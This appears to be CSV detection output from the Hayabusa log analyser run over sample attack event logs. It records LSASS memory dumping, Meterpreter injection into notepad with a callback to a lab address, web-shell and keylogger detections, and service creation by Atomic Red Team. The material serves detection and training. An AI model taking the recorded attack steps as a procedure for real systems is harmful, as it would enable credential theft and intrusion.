+2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx
+2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
